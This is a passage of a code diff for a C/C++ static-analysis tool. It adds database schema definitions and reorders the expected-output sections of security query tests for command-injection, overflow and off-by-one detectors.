@isfunction + | @islayoutcompatible + | @ispointerinterconvertiblebaseof + | @isarray + | @arrayrank + | @arrayextent + | @isarithmetic + | @iscompletetype + | @iscompound + | @isconst + | @isfloatingpoint + | @isfundamental + | @isintegral + | @islvaluereference + | @ismemberfunctionpointer + | @ismemberobjectpointer + | @ismemberpointer + | @isobject + | @ispointer + | @isreference + | @isrvaluereference + | @isscalar + | @issigned + | @isunsigned + | @isvoid + | @isvolatile + | @istriviallycopyassignable + | @isassignablenopreconditioncheck + | @referencebindstotemporary + | @issameas + | @builtinhasattribute + | @ispointerinterconvertiblewithclass + | @builtinispointerinterconvertiblewithclass + | @iscorrespondingmember + | @builtiniscorrespondingmember + | @isboundedarray + | @isunboundedarray + | @isreferenceable + | @isnothrowconvertible + | @referenceconstructsfromtemporary + | @referenceconvertsfromtemporary + | @isconvertible + | @isvalidwinrttype + | @iswinclass + | @iswininterface + | @istriviallyequalitycomparable + | @isscopedenum + | @istriviallyrelocatable + | @isinvocable + | @isnothrowinvocable + | @isbitwisecloneable + ; + +compound_requirement_is_noexcept( + int expr: @compound_requirement ref +); + +new_allocated_type( + unique int expr: @new_expr ref, + int type_id: @type ref +); + +new_array_allocated_type( + unique int expr: @new_array_expr ref, + int type_id: @type ref +); + +param_ref_to_this( + int expr: @param_ref ref +) + +/** + * The field being initialized by an initializer expression within an aggregate + * initializer for a class/struct/union. Position is used to sort repeated initializers. + */ +#keyset[aggregate, position] +aggregate_field_init( + int aggregate: @aggregateliteral ref, + int initializer: @expr ref, + int field: @membervariable ref, + int position: int ref, + boolean is_designated: boolean ref +); + +/** + * The index of the element being initialized by an initializer expression + * within an aggregate initializer for an array. Position is used to sort repeated initializers. + */ +#keyset[aggregate, position] +aggregate_array_init( + int aggregate: @aggregateliteral ref, + int initializer: @expr ref, + int element_index: int ref, + int position: int ref, + boolean is_designated: boolean ref +); + +@ctorinit = @ctordirectinit + | @ctorvirtualinit + | @ctorfieldinit + | @ctordelegatinginit; +@dtordestruct = @dtordirectdestruct + | @dtorvirtualdestruct + | @dtorfielddestruct; + + +condition_decl_bind( + unique int expr: @condition_decl ref, + unique int decl: @declaration ref +); + +typeid_bind( + unique int expr: @type_id ref, + int type_id: @type ref +); + +uuidof_bind( + unique int expr: @uuidof ref, + int type_id: @type ref +); + +@sizeof_or_alignof = @runtime_sizeof | @runtime_alignof | @datasizeof | @sizeof_pack; + +sizeof_bind( + unique int expr: @sizeof_or_alignof ref, + int type_id: @type ref +); + +code_block( + unique int block: @literal ref, + unique int routine: @function ref +); + +lambdas( + unique int expr: @lambdaexpr ref, + string default_capture: string ref, + boolean has_explicit_return_type: boolean ref, + boolean has_explicit_parameter_list: boolean ref +); + +lambda_capture( + unique int id: @lambdacapture, + int lambda: @lambdaexpr ref, + int index: int ref, + int field: @membervariable ref, + boolean captured_by_reference: boolean ref, + boolean is_implicit: boolean ref, + int location: @location_default ref +); + +@funbindexpr = @routineexpr + | @new_expr + | @delete_expr + | @delete_array_expr + | @ctordirectinit + | @ctorvirtualinit + | @ctordelegatinginit + | @dtordirectdestruct + | @dtorvirtualdestruct; + +@varbindexpr = @varaccess | @ctorfieldinit | @dtorfielddestruct; +@addressable = @function | @variable ; +@accessible = @addressable | @enumconstant ; + +@access = @varaccess | @routineexpr ; + +fold( + int expr: @foldexpr ref, + string operator: string ref, + boolean is_left_fold: boolean ref +); + +stmts( + unique int id: @stmt, + int kind: int ref, + int location: @location_default ref +); + +case @stmt.kind of + 1 = @stmt_expr +| 2 = @stmt_if +| 3 = @stmt_while +| 4 = @stmt_goto +| 5 = @stmt_label +| 6 = @stmt_return +| 7 = @stmt_block +| 8 = @stmt_end_test_while // do { ... } while ( ... ) +| 9 = @stmt_for +| 10 = @stmt_switch_case +| 11 = @stmt_switch +| 13 = @stmt_asm // "asm" statement or the body of an asm function +| 15 = @stmt_try_block +| 16 = @stmt_microsoft_try // Microsoft +| 17 = @stmt_decl +| 18 = @stmt_set_vla_size // C99 +| 19 = @stmt_vla_decl // C99 +| 25 = @stmt_assigned_goto // GNU +| 26 = @stmt_empty +| 27 = @stmt_continue +| 28 = @stmt_break +| 29 = @stmt_range_based_for // C++11 +// ... 30 @stmt_at_autoreleasepool_block deprecated +// ... 31 @stmt_objc_for_in deprecated +// ... 32 @stmt_at_synchronized deprecated +| 33 = @stmt_handler +// ... 34 @stmt_finally_end deprecated +| 35 = @stmt_constexpr_if +| 37 = @stmt_co_return +| 38 = @stmt_consteval_if +| 39 = @stmt_not_consteval_if +| 40 = @stmt_leave +; + +type_vla( + int type_id: @type ref, + int decl: @stmt_vla_decl ref +); + +variable_vla( + int var: @variable ref, + int decl: @stmt_vla_decl ref +); + +type_is_vla(unique int type_id: @derivedtype ref) + +if_initialization( + unique int if_stmt: @stmt_if ref, + int init_id: @stmt ref +); + +if_then( + unique int if_stmt: @stmt_if ref, + int then_id: @stmt ref +); + +if_else( + unique int if_stmt: @stmt_if ref, + int else_id: @stmt ref +); + +constexpr_if_initialization( + unique int constexpr_if_stmt: @stmt_constexpr_if ref, + int init_id: @stmt ref +); + +constexpr_if_then( + unique int constexpr_if_stmt: @stmt_constexpr_if ref, + int then_id: @stmt ref +); + +constexpr_if_else( + unique int constexpr_if_stmt: @stmt_constexpr_if ref, + int else_id: @stmt ref +); + +@stmt_consteval_or_not_consteval_if = @stmt_consteval_if | @stmt_not_consteval_if; + +consteval_if_then( + unique int constexpr_if_stmt: @stmt_consteval_or_not_consteval_if ref, + int then_id: @stmt ref +); + +consteval_if_else( + unique int constexpr_if_stmt: @stmt_consteval_or_not_consteval_if ref, + int else_id: @stmt ref +); + +while_body( + unique int while_stmt: @stmt_while ref, + int body_id: @stmt ref +); + +do_body( + unique int do_stmt: @stmt_end_test_while ref, + int body_id: @stmt ref +); + +switch_initialization( + unique int switch_stmt: @stmt_switch ref, + int init_id: @stmt ref +); + +#keyset[switch_stmt, index] +switch_case( + int switch_stmt: @stmt_switch ref, + int index: int ref, + int case_id: @stmt_switch_case ref +); + +switch_body( + unique int switch_stmt: @stmt_switch ref, + int body_id: @stmt ref +); + +@stmt_for_or_range_based_for = @stmt_for + | @stmt_range_based_for; + +for_initialization( + unique int for_stmt: @stmt_for_or_range_based_for ref, + int init_id: @stmt ref +); + +for_condition( + unique int for_stmt: @stmt_for ref, + int condition_id: @expr ref +); + +for_update( + unique int for_stmt: @stmt_for ref, + int update_id: @expr ref +); + +for_body( + unique int for_stmt: @stmt_for ref, + int body_id: @stmt ref +); + +@stmtparent = @stmt | @expr_stmt ; +stmtparents( + unique int id: @stmt ref, + int index: int ref, + int parent: @stmtparent ref +); + +ishandler(unique int block: @stmt_block ref); + +@cfgnode = @stmt | @expr | @function | @initialiser ; + +stmt_decl_bind( + int stmt: @stmt_decl ref, + int num: int ref, + int decl: @declaration ref +); + +stmt_decl_entry_bind( + int stmt: @stmt_decl ref, + int num: int ref, + int decl_entry: @element ref +); + +@parameterized_element = @function | @stmt_block | @requires_expr; + +blockscope( + unique int block: @stmt_block ref, + int enclosing: @parameterized_element ref +); + +@jump = @stmt_goto | @stmt_break | @stmt_continue | @stmt_leave; + +@jumporlabel = @jump | @stmt_label | @literal; + +jumpinfo( + unique int id: @jumporlabel ref, + string str: string ref, + int target: @stmt ref +); + +preprocdirects( + unique int id: @preprocdirect, + int kind: int ref, + int location: @location_default ref +); +case @preprocdirect.kind of + 0 = @ppd_if +| 1 = @ppd_ifdef +| 2 = @ppd_ifndef +| 3 = @ppd_elif +| 4 = @ppd_else +| 5 = @ppd_endif +| 6 = @ppd_plain_include +| 7 = @ppd_define +| 8 = @ppd_undef +| 9 = @ppd_line +| 10 = @ppd_error +| 11 = @ppd_pragma +| 12 = @ppd_objc_import +| 13 = @ppd_include_next +| 14 = @ppd_ms_import +| 15 = @ppd_elifdef +| 16 = @ppd_elifndef +| 17 = @ppd_embed +| 18 = @ppd_warning +; + +@ppd_include = @ppd_plain_include | @ppd_objc_import | @ppd_include_next | @ppd_ms_import; + +@ppd_branch = @ppd_if | @ppd_ifdef | @ppd_ifndef | @ppd_elif | @ppd_elifdef | @ppd_elifndef; + +preprocpair( + int begin : @ppd_branch ref, + int elseelifend : @preprocdirect ref +); + +preproctrue(int branch : @ppd_branch ref); +preprocfalse(int branch : @ppd_branch ref); + +preproctext( + unique int id: @preprocdirect ref, + string head: string ref, + string body: string ref +); + +includes( + unique int id: @ppd_include ref, + int included: @file ref +); + +embeds( + unique int id: @ppd_embed ref, + int included: @file ref +); + +link_targets( + int id: @link_target, + int binary: @file ref +); + +link_parent( + int element : @element ref, + int link_target : @link_target ref +); + +/*- Database metadata -*/ + +/** + * The CLI will automatically emit applicable tuples for this table, + * such as `databaseMetadata("isOverlay", "true")` when building an + * overlay database. + */ +databaseMetadata( + string metadataKey: string ref, + string value: string ref +); + +/*- Overlay support -*/ + +/** + * The CLI will automatically emit tuples for each new/modified/deleted file + * when building an overlay database. + */ +overlayChangedFiles( + string path: string ref +); + +/*- XML Files -*/ + +xmlEncoding( + unique int id: @file ref, + string encoding: string ref +); + +xmlDTDs( + unique int id: @xmldtd, + string root: string ref, + string publicId: string ref, + string systemId: string ref, + int fileid: @file ref +); + +xmlElements( + unique int id: @xmlelement, + string name: string ref, + int parentid: @xmlparent ref, + int idx: int ref, + int fileid: @file ref +); + +xmlAttrs( + unique int id: @xmlattribute, + int elementid: @xmlelement ref, + string name: string ref, + string value: string ref, + int idx: int ref, + int fileid: @file ref +); + +xmlNs( + int id: @xmlnamespace, + string prefixName: string ref, + string URI: string ref, + int fileid: @file ref +); + +xmlHasNs( + int elementId: @xmlnamespaceable ref, + int nsId: @xmlnamespace ref, + int fileid: @file ref +); + +xmlComments( + unique int id: @xmlcomment, + string text: string ref, + int parentid: @xmlparent ref, + int fileid: @file ref +); + +xmlChars( + unique int id: @xmlcharacters, + string text: string ref, + int parentid: @xmlparent ref, + int idx: int ref, + int isCDATA: int ref, + int fileid: @file ref +); + +@xmlparent = @file | @xmlelement; +@xmlnamespaceable = @xmlelement | @xmlattribute; + +xmllocations( + int xmlElement: @xmllocatable ref, + int location: @location_default ref +); + +@xmllocatable = @xmlcharacters | @xmlelement | @xmlcomment | @xmlattribute | @xmldtd | @file | @xmlnamespace; diff --git a/cpp/ql/lib/upgrades/ef8d209a22e27413aaaeff4446f0ecb9fa2c227b/upgrade.properties b/cpp/ql/lib/upgrades/ef8d209a22e27413aaaeff4446f0ecb9fa2c227b/upgrade.properties new file mode 100644 index 000000000000..d3a842d2cbb5 --- /dev/null +++ b/cpp/ql/lib/upgrades/ef8d209a22e27413aaaeff4446f0ecb9fa2c227b/upgrade.properties @@ -0,0 +1,2 @@ +description: Fix NameQualifier inconsistency +compatibility: full diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-078/WordexpTainted.expected b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-078/WordexpTainted.expected index b03a1ff7040e..e3afe00da6ef 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-078/WordexpTainted.expected +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-078/WordexpTainted.expected @@ -1,5 +1,3 @@ -#select -| test.cpp:29:13:29:20 | *filePath | test.cpp:22:27:22:30 | **argv | test.cpp:29:13:29:20 | *filePath | Using user-supplied data in a `wordexp` command, without disabling command substitution, can make code vulnerable to command injection. | edges | test.cpp:22:27:22:30 | **argv | test.cpp:23:20:23:26 | *access to array | provenance | | | test.cpp:23:20:23:26 | *access to array | test.cpp:29:13:29:20 | *filePath | provenance | | @@ -8,3 +6,5 @@ nodes | test.cpp:23:20:23:26 | *access to array | semmle.label | *access to array | | test.cpp:29:13:29:20 | *filePath | semmle.label | *filePath | subpaths +#select +| test.cpp:29:13:29:20 | *filePath | test.cpp:22:27:22:30 | **argv | test.cpp:29:13:29:20 | *filePath | Using user-supplied data in a `wordexp` command, without disabling command substitution, can make code vulnerable to command injection. | diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-190/AllocMultiplicationOverflow/AllocMultiplicationOverflow.expected b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-190/AllocMultiplicationOverflow/AllocMultiplicationOverflow.expected index 2d714cac53e6..c55008f6550c 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-190/AllocMultiplicationOverflow/AllocMultiplicationOverflow.expected +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-190/AllocMultiplicationOverflow/AllocMultiplicationOverflow.expected @@ -1,13 +1,3 @@ -#select -| test.cpp:13:33:13:37 | ... * ... | test.cpp:13:33:13:37 | ... * ... | test.cpp:13:33:13:37 | ... * ... | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:13:33:13:37 | ... * ... | multiplication | -| test.cpp:15:31:15:35 | ... * ... | test.cpp:15:31:15:35 | ... * ... | test.cpp:15:31:15:35 | ... * ... | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:15:31:15:35 | ... * ... | multiplication | -| test.cpp:19:34:19:38 | ... * ... | test.cpp:19:34:19:38 | ... * ... | test.cpp:19:34:19:38 | ... * ... | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:19:34:19:38 | ... * ... | multiplication | -| test.cpp:23:33:23:37 | size1 | test.cpp:22:17:22:21 | ... * ... | test.cpp:23:33:23:37 | size1 | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:22:17:22:21 | ... * ... | multiplication | -| test.cpp:30:18:30:32 | ... * ... | test.cpp:30:18:30:32 | ... * ... | test.cpp:30:18:30:32 | ... * ... | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:30:18:30:32 | ... * ... | multiplication | -| test.cpp:31:18:31:32 | ... * ... | test.cpp:31:18:31:32 | ... * ... | test.cpp:31:18:31:32 | ... * ... | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:31:18:31:32 | ... * ... | multiplication | -| test.cpp:37:46:37:49 | size | test.cpp:45:36:45:40 | ... * ... | test.cpp:37:46:37:49 | size | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:45:36:45:40 | ... * ... | multiplication | -| test.cpp:45:36:45:40 | ... * ... | test.cpp:45:36:45:40 | ... * ... | test.cpp:45:36:45:40 | ... * ... | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:45:36:45:40 | ... * ... | multiplication | -| test.cpp:46:36:46:40 | ... * ... | test.cpp:46:36:46:40 | ... * ... | test.cpp:46:36:46:40 | ... * ... | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:46:36:46:40 | ... * ... | multiplication | edges | test.cpp:22:17:22:21 | ... * ... | test.cpp:22:17:22:21 | ... * ... | provenance | | | test.cpp:22:17:22:21 | ... * ... | test.cpp:23:33:23:37 | size1 | provenance | | @@ -28,3 +18,13 @@ nodes | test.cpp:45:36:45:40 | ... * ... | semmle.label | ... * ... | | test.cpp:46:36:46:40 | ... * ... | semmle.label | ... * ... | subpaths +#select +| test.cpp:13:33:13:37 | ... * ... | test.cpp:13:33:13:37 | ... * ... | test.cpp:13:33:13:37 | ... * ... | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:13:33:13:37 | ... * ... | multiplication | +| test.cpp:15:31:15:35 | ... * ... | test.cpp:15:31:15:35 | ... * ... | test.cpp:15:31:15:35 | ... * ... | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:15:31:15:35 | ... * ... | multiplication | +| test.cpp:19:34:19:38 | ... * ... | test.cpp:19:34:19:38 | ... * ... | test.cpp:19:34:19:38 | ... * ... | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:19:34:19:38 | ... * ... | multiplication | +| test.cpp:23:33:23:37 | size1 | test.cpp:22:17:22:21 | ... * ... | test.cpp:23:33:23:37 | size1 | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:22:17:22:21 | ... * ... | multiplication | +| test.cpp:30:18:30:32 | ... * ... | test.cpp:30:18:30:32 | ... * ... | test.cpp:30:18:30:32 | ... * ... | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:30:18:30:32 | ... * ... | multiplication | +| test.cpp:31:18:31:32 | ... * ... | test.cpp:31:18:31:32 | ... * ... | test.cpp:31:18:31:32 | ... * ... | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:31:18:31:32 | ... * ... | multiplication | +| test.cpp:37:46:37:49 | size | test.cpp:45:36:45:40 | ... * ... | test.cpp:37:46:37:49 | size | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:45:36:45:40 | ... * ... | multiplication | +| test.cpp:45:36:45:40 | ... * ... | test.cpp:45:36:45:40 | ... * ... | test.cpp:45:36:45:40 | ... * ... | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:45:36:45:40 | ... * ... | multiplication | +| test.cpp:46:36:46:40 | ... * ... | test.cpp:46:36:46:40 | ... * ... | test.cpp:46:36:46:40 | ... * ... | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:46:36:46:40 | ... * ... | multiplication | diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/array-access/ArrayAccessProductFlow.expected b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/array-access/ArrayAccessProductFlow.expected index ec17b2bd2f4a..b343a4b47ede 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/array-access/ArrayAccessProductFlow.expected +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/array-access/ArrayAccessProductFlow.expected @@ -1,22 +1,3 @@ -#select -| test.cpp:10:9:10:11 | arr | test.cpp:4:17:4:22 | call to malloc | test.cpp:10:9:10:11 | arr | Off-by one error allocated at $@ bounded by $@. | test.cpp:4:17:4:22 | call to malloc | call to malloc | test.cpp:4:24:4:27 | size | size | -| test.cpp:10:9:10:11 | arr | test.cpp:4:17:4:22 | call to malloc | test.cpp:10:9:10:11 | arr | Off-by one error allocated at $@ bounded by $@. | test.cpp:4:17:4:22 | call to malloc | call to malloc | test.cpp:4:24:4:27 | size | size | -| test.cpp:10:9:10:11 | arr | test.cpp:4:17:4:22 | call to malloc | test.cpp:10:9:10:11 | arr | Off-by one error allocated at $@ bounded by $@. | test.cpp:4:17:4:22 | call to malloc | call to malloc | test.cpp:5:25:5:28 | size | size | -| test.cpp:10:9:10:11 | arr | test.cpp:4:17:4:22 | call to malloc | test.cpp:10:9:10:11 | arr | Off-by one error allocated at $@ bounded by $@. | test.cpp:4:17:4:22 | call to malloc | call to malloc | test.cpp:9:26:9:29 | size | size | -| test.cpp:35:13:35:13 | p | test.cpp:21:13:21:18 | call to malloc | test.cpp:35:13:35:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:21:13:21:18 | call to malloc | call to malloc | test.cpp:30:29:30:32 | size | size | -| test.cpp:35:13:35:13 | p | test.cpp:21:13:21:18 | call to malloc | test.cpp:35:13:35:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:21:13:21:18 | call to malloc | call to malloc | test.cpp:34:30:34:33 | size | size | -| test.cpp:45:13:45:13 | p | test.cpp:21:13:21:18 | call to malloc | test.cpp:45:13:45:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:21:13:21:18 | call to malloc | call to malloc | test.cpp:40:29:40:32 | size | size | -| test.cpp:45:13:45:13 | p | test.cpp:21:13:21:18 | call to malloc | test.cpp:45:13:45:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:21:13:21:18 | call to malloc | call to malloc | test.cpp:44:30:44:33 | size | size | -| test.cpp:63:13:63:13 | p | test.cpp:55:13:55:18 | call to malloc | test.cpp:63:13:63:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:55:13:55:18 | call to malloc | call to malloc | test.cpp:55:20:55:23 | size | size | -| test.cpp:63:13:63:13 | p | test.cpp:55:13:55:18 | call to malloc | test.cpp:63:13:63:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:55:13:55:18 | call to malloc | call to malloc | test.cpp:55:20:55:23 | size | size | -| test.cpp:63:13:63:13 | p | test.cpp:55:13:55:18 | call to malloc | test.cpp:63:13:63:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:55:13:55:18 | call to malloc | call to malloc | test.cpp:56:5:56:19 | ... = ... | ... = ... | -| test.cpp:63:13:63:13 | p | test.cpp:55:13:55:18 | call to malloc | test.cpp:63:13:63:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:55:13:55:18 | call to malloc | call to malloc | test.cpp:56:5:56:19 | ... = ... | ... = ... | -| test.cpp:63:13:63:13 | p | test.cpp:55:13:55:18 | call to malloc | test.cpp:63:13:63:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:55:13:55:18 | call to malloc | call to malloc | test.cpp:56:16:56:19 | size | size | -| test.cpp:63:13:63:13 | p | test.cpp:55:13:55:18 | call to malloc | test.cpp:63:13:63:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:55:13:55:18 | call to malloc | call to malloc | test.cpp:58:29:58:32 | size | size | -| test.cpp:63:13:63:13 | p | test.cpp:55:13:55:18 | call to malloc | test.cpp:63:13:63:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:55:13:55:18 | call to malloc | call to malloc | test.cpp:62:30:62:33 | size | size | -| test.cpp:83:14:83:14 | p | test.cpp:69:14:69:19 | call to malloc | test.cpp:83:14:83:14 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:69:14:69:19 | call to malloc | call to malloc | test.cpp:82:31:82:34 | size | size | -| test.cpp:93:14:93:14 | p | test.cpp:69:14:69:19 | call to malloc | test.cpp:93:14:93:14 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:69:14:69:19 | call to malloc | call to malloc | test.cpp:88:30:88:33 | size | size | -| test.cpp:93:14:93:14 | p | test.cpp:69:14:69:19 | call to malloc | test.cpp:93:14:93:14 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:69:14:69:19 | call to malloc | call to malloc | test.cpp:92:31:92:34 | size | size | edges | test.cpp:4:17:4:22 | call to malloc | test.cpp:4:17:4:22 | call to malloc | provenance | | | test.cpp:4:17:4:22 | call to malloc | test.cpp:6:9:6:11 | arr | provenance | | @@ -118,3 +99,22 @@ nodes | test.cpp:98:18:98:27 | test6_callee output argument [p] | semmle.label | test6_callee output argument [p] | subpaths | test.cpp:98:18:98:27 | *call to mk_array_p [p] | test.cpp:87:28:87:30 | *arr [p] | test.cpp:87:28:87:30 | *arr [p] | test.cpp:98:18:98:27 | test6_callee output argument [p] | +#select +| test.cpp:10:9:10:11 | arr | test.cpp:4:17:4:22 | call to malloc | test.cpp:10:9:10:11 | arr | Off-by one error allocated at $@ bounded by $@. | test.cpp:4:17:4:22 | call to malloc | call to malloc | test.cpp:4:24:4:27 | size | size | +| test.cpp:10:9:10:11 | arr | test.cpp:4:17:4:22 | call to malloc | test.cpp:10:9:10:11 | arr | Off-by one error allocated at $@ bounded by $@. | test.cpp:4:17:4:22 | call to malloc | call to malloc | test.cpp:4:24:4:27 | size | size | +| test.cpp:10:9:10:11 | arr | test.cpp:4:17:4:22 | call to malloc | test.cpp:10:9:10:11 | arr | Off-by one error allocated at $@ bounded by $@. | test.cpp:4:17:4:22 | call to malloc | call to malloc | test.cpp:5:25:5:28 | size | size | +| test.cpp:10:9:10:11 | arr | test.cpp:4:17:4:22 | call to malloc | test.cpp:10:9:10:11 | arr | Off-by one error allocated at $@ bounded by $@. | test.cpp:4:17:4:22 | call to malloc | call to malloc | test.cpp:9:26:9:29 | size | size | +| test.cpp:35:13:35:13 | p | test.cpp:21:13:21:18 | call to malloc | test.cpp:35:13:35:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:21:13:21:18 | call to malloc | call to malloc | test.cpp:30:29:30:32 | size | size | +| test.cpp:35:13:35:13 | p | test.cpp:21:13:21:18 | call to malloc | test.cpp:35:13:35:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:21:13:21:18 | call to malloc | call to malloc | test.cpp:34:30:34:33 | size | size | +| test.cpp:45:13:45:13 | p | test.cpp:21:13:21:18 | call to malloc | test.cpp:45:13:45:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:21:13:21:18 | call to malloc | call to malloc | test.cpp:40:29:40:32 | size | size | +| test.cpp:45:13:45:13 | p | test.cpp:21:13:21:18 | call to malloc | test.cpp:45:13:45:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:21:13:21:18 | call to malloc | call to malloc | test.cpp:44:30:44:33 | size | size | +| test.cpp:63:13:63:13 | p | test.cpp:55:13:55:18 | call to malloc | test.cpp:63:13:63:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:55:13:55:18 | call to malloc | call to malloc | test.cpp:55:20:55:23 | size | size | +| test.cpp:63:13:63:13 | p | test.cpp:55:13:55:18 | call to malloc | test.cpp:63:13:63:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:55:13:55:18 | call to malloc | call to malloc | test.cpp:55:20:55:23 | size | size | +| test.cpp:63:13:63:13 | p | test.cpp:55:13:55:18 | call to malloc | test.cpp:63:13:63:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:55:13:55:18 | call to malloc | call to malloc | test.cpp:56:5:56:19 | ... = ... | ... = ... | +| test.cpp:63:13:63:13 | p | test.cpp:55:13:55:18 | call to malloc | test.cpp:63:13:63:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:55:13:55:18 | call to malloc | call to malloc | test.cpp:56:5:56:19 | ... = ... | ... = ... | +| test.cpp:63:13:63:13 | p | test.cpp:55:13:55:18 | call to malloc | test.cpp:63:13:63:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:55:13:55:18 | call to malloc | call to malloc | test.cpp:56:16:56:19 | size | size | +| test.cpp:63:13:63:13 | p | test.cpp:55:13:55:18 | call to malloc | test.cpp:63:13:63:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:55:13:55:18 | call to malloc | call to malloc | test.cpp:58:29:58:32 | size | size | +| test.cpp:63:13:63:13 | p | test.cpp:55:13:55:18 | call to malloc | test.cpp:63:13:63:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:55:13:55:18 | call to malloc | call to malloc | test.cpp:62:30:62:33 | size | size | +| test.cpp:83:14:83:14 | p | test.cpp:69:14:69:19 | call to malloc | test.cpp:83:14:83:14 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:69:14:69:19 | call to malloc | call to malloc | test.cpp:82:31:82:34 | size | size | +| test.cpp:93:14:93:14 | p | test.cpp:69:14:69:19 | call to malloc | test.cpp:93:14:93:14 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:69:14:69:19 | call to malloc | call to malloc | test.cpp:88:30:88:33 | size | size | +| test.cpp:93:14:93:14 | p | test.cpp:69:14:69:19 | call to malloc | test.cpp:93:14:93:14 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:69:14:69:19 | call to malloc | call to malloc | test.cpp:92:31:92:34 | size | size | diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/constant-size/ConstantSizeArrayOffByOne.expected b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/constant-size/ConstantSizeArrayOffByOne.expected index 1aa7c546e12e..a4c154c06940 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/constant-size/ConstantSizeArrayOffByOne.expected +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/constant-size/ConstantSizeArrayOffByOne.expected @@ -1,25 +1,3 @@ -#select -| test.cpp:35:5:35:22 | PointerAdd: access to array | test.cpp:35:10:35:12 | buf | test.cpp:35:5:35:22 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:15:9:15:11 | buf | buf | test.cpp:35:5:35:26 | Store: ... = ... | write | -| test.cpp:36:5:36:24 | PointerAdd: access to array | test.cpp:36:10:36:12 | buf | test.cpp:36:5:36:24 | access to array | This pointer arithmetic may have an off-by-2 error allowing it to overrun $@ at this $@. | test.cpp:15:9:15:11 | buf | buf | test.cpp:36:5:36:28 | Store: ... = ... | write | -| test.cpp:43:9:43:19 | PointerAdd: access to array | test.cpp:43:14:43:16 | buf | test.cpp:43:9:43:19 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:15:9:15:11 | buf | buf | test.cpp:43:9:43:23 | Store: ... = ... | write | -| test.cpp:49:5:49:22 | PointerAdd: access to array | test.cpp:49:10:49:12 | buf | test.cpp:49:5:49:22 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:19:9:19:11 | buf | buf | test.cpp:49:5:49:26 | Store: ... = ... | write | -| test.cpp:50:5:50:24 | PointerAdd: access to array | test.cpp:50:10:50:12 | buf | test.cpp:50:5:50:24 | access to array | This pointer arithmetic may have an off-by-2 error allowing it to overrun $@ at this $@. | test.cpp:19:9:19:11 | buf | buf | test.cpp:50:5:50:28 | Store: ... = ... | write | -| test.cpp:57:9:57:19 | PointerAdd: access to array | test.cpp:57:14:57:16 | buf | test.cpp:57:9:57:19 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:19:9:19:11 | buf | buf | test.cpp:57:9:57:23 | Store: ... = ... | write | -| test.cpp:61:9:61:19 | PointerAdd: access to array | test.cpp:61:14:61:16 | buf | test.cpp:61:9:61:19 | access to array | This pointer arithmetic may have an off-by-2 error allowing it to overrun $@ at this $@. | test.cpp:19:9:19:11 | buf | buf | test.cpp:61:9:61:23 | Store: ... = ... | write | -| test.cpp:72:5:72:15 | PointerAdd: access to array | test.cpp:79:32:79:34 | buf | test.cpp:72:5:72:15 | access to array | This pointer 